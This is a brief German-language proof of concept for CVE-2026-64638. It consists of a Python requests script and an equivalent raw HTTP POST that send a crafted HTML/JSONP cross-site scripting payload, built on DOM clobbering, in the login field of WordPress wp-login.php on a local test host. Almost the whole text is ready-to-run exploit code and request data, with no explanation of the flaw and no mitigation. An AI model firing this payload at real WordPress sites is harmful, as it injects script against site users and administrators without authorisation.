
Minimaler Python-Proof-of-Concept für CVE-2026-64638, der einen manipulierten HTML/JSONP-XSS-Payload an die WordPress-Datei wp-login.php sendet.
CVE-2026-64638
schneller Versuch
import requests
target = "http://127.0.0.1:9000/wp-login.php"
payload = '< area id=ajaxurl href=/?rest_route=/&_method=GET&_jsonp=alert>< div id=color-picker class=reset-pass-submit>< button class="wp-generate-pw color-option">X'
response = requests.post(target, data={"log": payload, "pwd": "x"}, timeout=5)
print(response.status_code)
print(response.text)
oder
POST /wp-login.php HTTP/1.1
Host: 127.0.0.1:9000
Content-Type: application/x-www-form-urlencoded
User-Agent: python-requests
Accept: */*
Connection: close
log=%3C+area+id%3Dajaxurl+href%3D%2F%3Frest_route%3D%2F%26_method%3DGET%26_jsonp%3Dalert%3E%3C+div+id%3Dcolor-picker+class%3Dreset-pass-submit%3E%3C+button+class%3D%22wp-generate-pw+color-option%22%3EX&pwd=x